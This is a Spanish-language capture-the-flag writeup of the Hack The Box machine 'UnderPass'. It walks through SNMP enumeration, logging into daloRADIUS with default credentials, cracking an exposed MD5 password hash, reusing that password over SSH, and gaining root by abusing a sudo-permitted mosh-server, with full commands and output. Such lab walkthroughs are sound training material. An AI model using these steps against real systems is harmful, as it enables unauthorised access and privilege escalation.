Table of Contents
Hack The Box: UnderPass Writeup
Welcome to my detailed writeup of the easy difficulty machine “UnderPass” on Hack The Box. This writeup will cover the steps taken to achieve initial foothold and escalation to root.
TCP Enumeration
1rustscan -a 10.129.100.98 --ulimit 5000 -g
210.129.100.98 -> [22,80]
1nmap -p22,80 -sCV 10.129.100.98 -oN allPorts
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 17:38 CET
3Nmap scan report for 10.129.100.98
4Host is up (0.038s latency).
5
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
8| ssh-hostkey:
9| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
10|_ 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
1180/tcp open http Apache httpd 2.4.52 ((Ubuntu))
12|_http-server-header: Apache/2.4.52 (Ubuntu)
13|_http-title: Apache2 Ubuntu Default Page: It works
14Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
15
16Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
17Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds
UDP Enumeration
1sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 10.129.100.98 -oN allPorts.UDP
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 17:46 CET
3Nmap scan report for 10.129.100.98
4Host is up (0.039s latency).
5Not shown: 1493 open|filtered udp ports (no-response)
6PORT STATE SERVICE
723/udp closed telnet
8136/udp closed profile
9161/udp open snmp
1019141/udp closed unknown
1121282/udp closed unknown
1222417/udp closed unknown
1339213/udp closed sygatefw
14
15Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds
Encontramos que está el puerto 161/UDP correspondiente al servicio SNMP abierto, por lo cual vamos a enumerarlo mas adelante.
HTTP Enumeration
Del escaneo inicial no encontramos nada relevante, así que vamos a enumerar el servicio web.
1whatweb http://10.129.100.98
2http://10.129.100.98 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[10.129.100.98], Title[Apache2 Ubuntu Default Page: It works]
whatweb nos reporta que estamos frente a la página por defecto de Apache2
Podemos utilizar feroxbuster para fuzzear por directorios/recursos interesante pero no encontramos nada.
1feroxbuster -u http://10.129.100.98/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -d 1 -t 100
2
3 ___ ___ __ __ __ __ __ ___
4|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
5| |___ | \ | \ | \__, \__/ / \ | |__/ |___
6by Ben "epi" Risher 🤓 ver: 2.10.3
7───────────────────────────┬──────────────────────
8 🎯 Target Url │ http://10.129.100.98/
9 🚀 Threads │ 100
10 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
11 👌 Status Codes │ All Status Codes!
12 💥 Timeout (secs) │ 7
13 🦡 User-Agent │ feroxbuster/2.10.3
14 💉 Config File │ /etc/feroxbuster/ferox-config.toml
15 🔎 Extract Links │ true
16 🏁 HTTP methods │ [GET]
17 🔃 Recursion Depth │ 1
18 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
19───────────────────────────┴──────────────────────
20 🏁 Press [ENTER] to use the Scan Management Menu™
21──────────────────────────────────────────────────
22403 GET 9l 28w 278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
23404 GET 9l 31w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
24200 GET 22l 105w 5952c http://10.129.100.98/icons/ubuntu-logo.png
25200 GET 363l 961w 10671c http://10.129.100.98/
Y si fuzzeamos por extensiones, tampoco encontramos nada.
1feroxbuster -u http://10.129.100.98/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -d 1 -t 100 -x php,txt,tar,zip,html,bk
2
3 ___ ___ __ __ __ __ __ ___
4|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
5| |___ | \ | \ | \__, \__/ / \ | |__/ |___
6by Ben "epi" Risher 🤓 ver: 2.10.3
7───────────────────────────┬──────────────────────
8 🎯 Target Url │ http://10.129.100.98/
9 🚀 Threads │ 100
10 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
11 👌 Status Codes │ All Status Codes!
12 💥 Timeout (secs) │ 7
13 🦡 User-Agent │ feroxbuster/2.10.3
14 💉 Config File │ /etc/feroxbuster/ferox-config.toml
15 🔎 Extract Links │ true
16 💲 Extensions │ [php, txt, tar, zip, html, bk]
17 🏁 HTTP methods │ [GET]
18 🔃 Recursion Depth │ 1
19 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
20───────────────────────────┴──────────────────────
21 🏁 Press [ENTER] to use the Scan Management Menu™
22──────────────────────────────────────────────────
23404 GET 9l 31w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
24403 GET 9l 28w 278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
25200 GET 363l 961w 10671c http://10.129.100.98/index.html
26200 GET 22l 105w 5952c http://10.129.100.98/icons/ubuntu-logo.png
27200 GET 363l 961w 10671c http://10.129.100.98/
Como no hemos encontrado nada de primeras, vamos a enumerar el servicio SNMP.
SNMP Enumeration
Primero vamos a necesitar una community string válida para hacer solicitudes SNMP, para ello podemos utilizar onesixtyone y la lista snmp-onesixtyone.txt de SecLists.
1onesixtyone 10.129.100.98 -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp-onesixtyone.txt -w 100
2Scanning 1 hosts, 3218 communities
310.129.100.98 [public] Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
410.129.100.98 [public] Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Encontramos la community string public, común en los servicios SNMP.
Con snmpbulkwalk podemos enumerar la información recabada por SNMP.
1snmpbulkwalk -v2c -c public 10.129.100.98
2SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
3SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
4DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (113511) 0:18:55.11
5SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
6SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
7SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas
8SNMPv2-MIB::sysServices.0 = INTEGER: 72
9SNMPv2-MIB::sysORLastChange.0 = Timeticks: (1) 0:00:00.01
10SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
11SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
12SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
13SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
14SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
15SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
16SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
17SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
18SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
19SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
20SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
21SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
22SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
23SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
24SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
25SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
26SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
27SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
28SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
29SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
30SNMPv2-MIB::sysORUpTime.1 = Timeticks: (1) 0:00:00.01
31SNMPv2-MIB::sysORUpTime.2 = Timeticks: (1) 0:00:00.01
32SNMPv2-MIB::sysORUpTime.3 = Timeticks: (1) 0:00:00.01
33SNMPv2-MIB::sysORUpTime.4 = Timeticks: (1) 0:00:00.01
34SNMPv2-MIB::sysORUpTime.5 = Timeticks: (1) 0:00:00.01
35SNMPv2-MIB::sysORUpTime.6 = Timeticks: (1) 0:00:00.01
36SNMPv2-MIB::sysORUpTime.7 = Timeticks: (1) 0:00:00.01
37SNMPv2-MIB::sysORUpTime.8 = Timeticks: (1) 0:00:00.01
38SNMPv2-MIB::sysORUpTime.9 = Timeticks: (1) 0:00:00.01
39SNMPv2-MIB::sysORUpTime.10 = Timeticks: (1) 0:00:00.01
40HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (114720) 0:19:07.20
41HOST-RESOURCES-MIB::hrSystemDate.0 = STRING: 2024-12-30,16:53:31.0,+0:0
42HOST-RESOURCES-MIB::hrSystemInitialLoadDevice.0 = INTEGER: 393216
43HOST-RESOURCES-MIB::hrSystemInitialLoadParameters.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
44"
45HOST-RESOURCES-MIB::hrSystemNumUsers.0 = Gauge32: 0
46HOST-RESOURCES-MIB::hrSystemProcesses.0 = Gauge32: 218
47HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = INTEGER: 0
48HOST-RESOURCES-MIB::hrSystemMaxProcesses.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
Encontramos tres cosas interesantes:
- Primero, que existe un usuario llamado
steve - Encontramos el dominio
underpass.htb, lo añadimos al/etc/hosts
La tercera cosa es el mensaje encontrado.
UnDerPass.htb is the only daloradius server in the basin!Discovering daloRADIUS
Recordemos que existe un protocolo llamado RADIUS que es un protocolo de red para autenticar, autorizar y “accounting” (AAA) para usuarios que se conecten a un servicio en red. Yo ya he trabajado con este protocolo y con Unifi Network así que tengo algo de experiencia con el.
Leyendo un poco de como funciona, vemos que está basado en FreeRADIUS y que utiliza PHP y soporta varias bases de datos.
Viendo este video de Youtube podemos ver como configurar este servicio y cuales son las rutas básicas para autenticarnos.
El endpoint para iniciar sesión se encuentra en /daloradius/login.php
En /daloradius podemos suponer que el recurso existe pero no tenemos capacidad de directory listing
Pero el recurso /login.php no existe.
Vamos a fuzzear de nuevo con feroxbuster ahora que sabemos que existe un directorio daloradius y que se utiliza PHP por detrás.
Como al principio encontramos algunos directorios, vamos a modificar el parámetro -d para fuzzear de forma automática dentro de los directorios que vayamos a encontrar.
1feroxbuster -u http://underpass.htb/daloradius/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -d 5 -t 100 -x php
2
3 ___ ___ __ __ __ __ __ ___
4|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
5| |___ | \ | \ | \__, \__/ / \ | |__/ |___
6by Ben "epi" Risher 🤓 ver: 2.10.3
7───────────────────────────┬──────────────────────
8 🎯 Target Url │ http://underpass.htb/daloradius/
9 🚀 Threads │ 100
10 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
11 👌 Status Codes │ All Status Codes!
12 💥 Timeout (secs) │ 7
13 🦡 User-Agent │ feroxbuster/2.10.3
14 💉 Config File │ /etc/feroxbuster/ferox-config.toml
15 🔎 Extract Links │ true
16 💲 Extensions │ [php]
17 🏁 HTTP methods │ [GET]
18 🔃 Recursion Depth │ 5
19 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
20───────────────────────────┴──────────────────────
21 🏁 Press [ENTER] to use the Scan Management Menu™
22──────────────────────────────────────────────────
23404 GET 9l 31w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
24403 GET 9l 28w 278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
25301 GET 9l 28w 327c http://underpass.htb/daloradius/library => http://underpass.htb/daloradius/library/
26301 GET 9l 28w 323c http://underpass.htb/daloradius/doc => http://underpass.htb/daloradius/doc/
27301 GET 9l 28w 327c http://underpass.htb/daloradius/contrib => http://underpass.htb/daloradius/contrib/
28200 GET 412l 3898w 24703c http://underpass.htb/daloradius/ChangeLog
29301 GET 9l 28w 325c http://underpass.htb/daloradius/setup => http://underpass.htb/daloradius/setup/
30200 GET 340l 2968w 18011c http://underpass.htb/daloradius/LICENSE
31301 GET 9l 28w 323c http://underpass.htb/daloradius/app => http://underpass.htb/daloradius/app/
32301 GET 9l 28w 331c http://underpass.htb/daloradius/doc/install => http://underpass.htb/daloradius/doc/install/
33301 GET 9l 28w 329c http://underpass.htb/daloradius/app/users => http://underpass.htb/daloradius/app/users/
34301 GET 9l 28w 330c http://underpass.htb/daloradius/contrib/db => http://underpass.htb/daloradius/contrib/db/
35301 GET 9l 28w 335c http://underpass.htb/daloradius/contrib/scripts => http://underpass.htb/daloradius/contrib/scripts/
36200 GET 247l 1010w 7814c http://underpass.htb/daloradius/doc/install/INSTALL
37301 GET 9l 28w 337c http://underpass.htb/daloradius/app/users/library => http://underpass.htb/daloradius/app/users/library/
38301 GET 9l 28w 337c http://underpass.htb/daloradius/app/users/include => http://underpass.htb/daloradius/app/users/include/
39301 GET 9l 28w 334c http://underpass.htb/daloradius/app/users/lang => http://underpass.htb/daloradius/app/users/lang/
40301 GET 9l 28w 333c http://underpass.htb/daloradius/app/operators => http://underpass.htb/daloradius/app/operators/
41302 GET 0l 0w 0c http://underpass.htb/daloradius/app/operators/index.php => home-main.php
42301 GET 9l 28w 340c http://underpass.htb/daloradius/app/operators/static => http://underpass.htb/daloradius/app/operators/static/
43301 GET 9l 28w 348c http://underpass.htb/daloradius/app/users/library/javascript => http://underpass.htb/daloradius/app/users/library/javascript/
44301 GET 9l 28w 347c http://underpass.htb/daloradius/contrib/scripts/maintenance => http://underpass.htb/daloradius/contrib/scripts/maintenance/
45301 GET 9l 28w 341c http://underpass.htb/daloradius/app/operators/library => http://underpass.htb/daloradius/app/operators/library/
46301 GET 9l 28w 348c http://underpass.htb/daloradius/app/users/include/management => http://underpass.htb/daloradius/app/users/include/management/
47301 GET 9l 28w 347c http://underpass.htb/daloradius/app/operators/static/images => http://underpass.htb/daloradius/app/operators/static/images/
48302 GET 0l 0w 0c http://underpass.htb/daloradius/app/operators/static/index.php => ../index.php
49302 GET 0l 0w 0c http://underpass.htb/daloradius/app/operators/static/images/index.php => ../../index.php
50301 GET 9l 28w 338c http://underpass.htb/daloradius/app/operators/lang => http://underpass.htb/daloradius/app/operators/lang/
51302 GET 0l 0w 0c http://underpass.htb/daloradius/app/operators/logout.php => login.php
52301 GET 9l 28w 344c http://underpass.htb/daloradius/app/users/include/common => http://underpass.htb/daloradius/app/users/include/common/
53301 GET 9l 28w 342c http://underpass.htb/daloradius/app/users/include/menu => http://underpass.htb/daloradius/app/users/include/menu/
54301 GET 9l 28w 344c http://underpass.htb/daloradius/app/operators/static/css => http://underpass.htb/daloradius/app/operators/static/css/
55301 GET 9l 28w 350c http://underpass.htb/daloradius/app/operators/static/css/icons => http://underpass.htb/daloradius/app/operators/static/css/icons/
56302 GET 0l 0w 0c http://underpass.htb/daloradius/app/operators/static/css/index.php => ../../index.php
57302 GET 0l 0w 0c http://underpass.htb/daloradius/app/users/lang/it.php => ../index.php
58301 GET 9l 28w 355c http://underpass.htb/daloradius/app/operators/static/images/favicon => http://underpass.htb/daloradius/app/operators/static/images/favicon/
59302 GET 0l 0w 0c http://underpass.htb/daloradius/app/operators/lang/it.php => ../index.php
60301 GET 9l 28w 344c http://underpass.htb/daloradius/app/users/library/graphs => http://underpass.htb/daloradius/app/users/library/graphs/
61302 GET 0l 0w 0c http://underpass.htb/daloradius/app/users/library/graphs/index.php => ../../index.php
62301 GET 9l 28w 355c http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor => http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor/
Viendo los resultados podemos ver algunos 302 Redirect que nos llevan a http://underpass.htb/daloradius/app/operators/static/index.php
Abusing Default Credentials
Si accedemos con nuestro navegador, podemos ver que se nos redirecciona de nuevo a el panel de autenticación.
Buscando en Google las credenciales por defecto del servicio, encontramos el combo
administrator:radius
Y podemos comprobar que estas credenciales son válidas e iniciamos sesión.
Exposed MD5 User Hash (Information Disclosure)
No encontramos vulnerabilidades asociadas a la versión 2.2 de daloRADIUS, pero vemos que existe un usuario creado en el sistema.
Por alguna razón el creador de daloRADIUS pensó que es buena idea dejar la credencial hasheada a plena vista al consultar los usuarios, por lo cual podemos ver que existe un usuario llamado svcMosh y su credencial hasheada.
Hash Cracking w/hashcat
Podemos comprobar el hash con hashid y podemos deducir que seguramente se trate de MD5 ya que MD2 y MD4 es menos común.
1hashid
2412DD4759978ACFCC81DEAB01B382403
3Analyzing '412DD4759978ACFCC81DEAB01B382403'
4[+] MD2
5[+] MD5
6[+] MD4
7[+] Double MD5
8[+] LM
9[+] RIPEMD-128
10[+] Haval-128
11[+] Tiger-128
12[+] Skein-256(128)
13[+] Skein-512(128)
14[+] Lotus Notes/Domino 5
15[+] Skype
16[+] Snefru-128
17[+] NTLM
18[+] Domain Cached Credentials
19[+] Domain Cached Credentials 2
20[+] DNSSEC(NSEC3)
21[+] RAdmin v2.x
Podemos con hashcat crackear este hash utilizando el modo 0 que corresponde a un hash MD5.
1C:\Users\pc\Desktop\hashcat-6.2.6>.\hashcat.exe -a 0 -m 0 .\hash.txt .\rockyou.txt
2hashcat (v6.2.6) starting
3
4hiprtcCompileProgram is missing from HIPRTC shared library.
5
6OpenCL API (OpenCL 2.1 AMD-APP (3584.0)) - Platform #1 [Advanced Micro Devices, Inc.]
7=====================================================================================
8* Device #1: Radeon RX 590 Series, 8064/8192 MB (6745 MB allocatable), 36MCU
9
10Minimum password length supported by kernel: 0
11Maximum password length supported by kernel: 256
12
13Hashes: 1 digests; 1 unique digests, 1 unique salts
14Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
15Rules: 1
16
17Optimizers applied:
18* Zero-Byte
19* Early-Skip
20* Not-Salted
21* Not-Iterated
22* Single-Hash
23* Single-Salt
24* Raw-Hash
25
26ATTENTION! Pure (unoptimized) backend kernels selected.
27Pure kernels can crack longer passwords, but drastically reduce performance.
28If you want to switch to optimized kernels, append -O to your commandline.
29See the above message to find out about the exact limits.
30
31Watchdog: Temperature abort trigger set to 90c
32
33Host memory required for this attack: 632 MB
34
35Dictionary cache hit:
36* Filename..: .\rockyou.txt
37* Passwords.: 14344387
38* Bytes.....: 139921525
39* Keyspace..: 14344387
40
41412dd4759978acfcc81deab01b382403:underwaterfriends
42
43Session..........: hashcat
44Status...........: Cracked
45Hash.Mode........: 0 (MD5)
46Hash.Target......: 412dd4759978acfcc81deab01b382403
47Time.Started.....: Mon Dec 30 18:15:00 2024 (0 secs)
48Time.Estimated...: Mon Dec 30 18:15:00 2024 (0 secs)
49Kernel.Feature...: Pure Kernel
50Guess.Base.......: File (.\rockyou.txt)
51Guess.Queue......: 1/1 (100.00%)
52Speed.#1.........: 21877.1 kH/s (8.51ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
53Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
54Progress.........: 4718592/14344387 (32.90%)
55Rejected.........: 0/4718592 (0.00%)
56Restore.Point....: 2359296/14344387 (16.45%)
57Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
58Candidate.Engine.: Device Generator
59Candidates.#1....: 15841530 -> peque├▒atraviesa
60Hardware.Mon.#1..: Temp: 54c Fan: 36% Util: 39% Core:1511MHz Mem:2000MHz Bus:16
61
62Started: Mon Dec 30 18:14:53 2024
63Stopped: Mon Dec 30 18:15:01 2024
Abusing Credentials Reuse
Y vemos que tenemos un nuevo combo.
svcMosh:underwaterfriendsPodemos probar a conectarnos por SSH con este combo y vemos que conseguimos establecer sesión.
1ssh svcMosh@underpass.htb
2The authenticity of host 'underpass.htb (10.129.100.98)' can't be established.
3ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
4This key is not known by any other names.
5Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
6Warning: Permanently added 'underpass.htb' (ED25519) to the list of known hosts.
7svcMosh@underpass.htb's password:
8Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
9
10 * Documentation: https://help.ubuntu.com
11 * Management: https://landscape.canonical.com
12 * Support: https://ubuntu.com/pro
13
14 System information as of Mon Dec 30 05:16:15 PM UTC 2024
15
16 System load: 0.09 Processes: 227
17 Usage of /: 88.5% of 3.75GB Users logged in: 0
18 Memory usage: 14% IPv4 address for eth0: 10.129.100.98
19 Swap usage: 0%
20
21 => / is using 88.5% of 3.75GB
22
23
24Expanded Security Maintenance for Applications is not enabled.
25
260 updates can be applied immediately.
27
28Enable ESM Apps to receive additional future security updates.
29See https://ubuntu.com/esm or run: sudo pro status
30
31
32The list of available updates is more than a week old.
33To check for new updates run: sudo apt update
34
35Last login: Thu Dec 12 15:45:42 2024 from 10.10.14.65
36svcMosh@underpass:~$ id
37uid=1002(svcMosh) gid=1002(svcMosh) groups=1002(svcMosh)
Podemos ver la flag de usuario.
1svcMosh@underpass:~$ cat user.txt
25dfd6b465b72dc...
Privilege Escalation
Podemos ver que el usuario svcMosh tiene permisos para ejecutar como el usuario que quiera y sin contraseña el binario /usr/bin/mosh-server
1svcMosh@underpass:~$ sudo -l
2Matching Defaults entries for svcMosh on localhost:
3 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
4
5User svcMosh may run the following commands on localhost:
6 (ALL) NOPASSWD: /usr/bin/mosh-server
Podemos comprobar que efectivamente es un binario.
1svcMosh@underpass:~$ file /usr/bin/mosh-server
2/usr/bin/mosh-server: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=26b56b88e14ea6edca803fb0309a81ed06a7e970, for GNU/Linux 3.2.0, stripped
Abusing mosh-server sudo privilege
Podemos comprobar en este sitio que es esto.
En resumen, mosh-server es el componente del lado servidor de Mosh, una herramienta para sesiones de terminal remotas que utiliza UDP en lugar de TCP. Se ejecuta en el servidor y abre un puerto UDP alto (por defecto entre 60000 y 61000) para aceptar conexiones del cliente. Además, genera una clave de cifrado para proteger la sesión. Al iniciarse, imprime el puerto y la clave en la salida estándar y espera que un cliente (mosh-client) se conecte en un plazo de 60 segundos.
Cuando un cliente se conecta, mosh-server establece una sesión interactiva utilizando el shell predeterminado del usuario. Si la conexión del cliente se interrumpe, puede reconectarse sin necesidad de reiniciar la sesión, gracias a que el uso de UDP permite manejar cambios de red o interrupciones temporales. El servidor se cierra automáticamente cuando el cliente termina la sesión o si no recibe conexión dentro del tiempo establecido.
Cuando ejecutamos mosh-server nos devuelve un puerto y una clave de cifrado.
1svcMosh@underpass:~$ /usr/bin/mosh-server
2
3
4MOSH CONNECT 60001 kWk1cK4x94r9UZvAVndj5g
5
6mosh-server (mosh 1.3.2) [build mosh 1.3.2]
7Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
8License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
9This is free software: you are free to change and redistribute it.
10There is NO WARRANTY, to the extent permitted by law.
11
12[mosh-server detached, pid = 2083]
Entonces técnicamente, si el proceso está siendo ejecutado como root y tenemos la clave de cifrado, podemos iniciar sesión como root utilizando mosh-client sin necesidad de saber la contraseña de root
Entonces podemos ejecutar el proceso como root
1svcMosh@underpass:~$ sudo /usr/bin/mosh-server
2
3
4MOSH CONNECT 60001 epr04rwHVS9hoFA/nVVoWA
5
6mosh-server (mosh 1.3.2) [build mosh 1.3.2]
7Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
8License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
9This is free software: you are free to change and redistribute it.
10There is NO WARRANTY, to the extent permitted by law.
11
12[mosh-server detached, pid = 2165]
Y ahora mirando el manual de mosh-client podemos ver que la clave de cifrado de 22 bytes en base64 creada por mosh-server la debemos exportar en la variable de entorno MOSH_KEY
Y ahora podemos utilizar mosh-client para ganar una sesión como root, primero exportamos la clave generada por el servidor a la variable de entorno MOSH_KEY
1export MOSH_KEY=epr04rwHVS9hoFA/nVVoWA
Y ahora podemos utilizar mosh-client para establecer la sesión.
1svcMosh@underpass:~$ mosh-client 127.0.0.1 60001
2....
3root@underpass:~# id
4uid=0(root) gid=0(root) groups=0(root)
Podemos leer la flag de root
1root@underpass:~# cat root.txt
2f316f248d310c...
¡Y ya estaría!
Happy Hacking! 🚀
#HackTheBox #UnderPass #Writeup #Cybersecurity #Penetration Testing #CTF #Reverse Shell #Privilege Escalation #RCE #Exploit #Linux #HTTP Enumeration #SNMP Enumeration #DaloRADIUS #Abusing Default Credentials #Exposed MD5 User Hash #Information Disclosure #Hash Cracking #Cracking #Abusing Credentials Reuse #Abusing Mosh-Server